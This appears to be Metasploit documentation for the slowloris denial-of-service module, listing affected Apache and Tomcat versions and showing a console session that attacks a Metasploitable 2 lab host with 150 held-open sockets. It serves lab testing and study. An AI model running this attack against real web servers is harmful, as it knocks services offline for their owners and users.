Vulnerable Application
This module tries to keep many connections to the target web server open and hold them open as long as possible.
To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at https://sourceforge.net/projects/metasploitable/files/Metasploitable2/.
Vulnerable application versions include:
Apache HTTP Server 1.x and 2.x
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta
Verification Steps
Start msfconsole
Do: use auxiliary/dos/http/slowloris
Do: set RHOST
Do: run
Visit server URL in your web-browser.
Scenarios
Apache/2.2.8 - Ubuntu 8.04
msf > use auxiliary/dos/http/slowloris
msf auxiliary(slowloris) > show options
Module options (auxiliary/dos/http/slowloris):
Name Current Setting Required Description
---- --------------- -------- -----------
delay 15 yes The delay between sending keep-alive headers
rand_user_agent true yes Randomizes user-agent with each request
rhost 172.28.128.4 yes The target address
rport 80 yes The target port
sockets 150 yes The number of sockets to use in the attack
ssl false yes Negotiate SSL/TLS for outgoing connections
msf auxiliary(slowloris) > set rhost 172.28.128.4
rhost => 172.28.128.4
msf auxiliary(slowloris) > run
[*] Starting server...
[*] Attacking 172.28.128.4 with 150 sockets
[*] Creating sockets...
[*] Sending keep-alive headers... Socket count: 150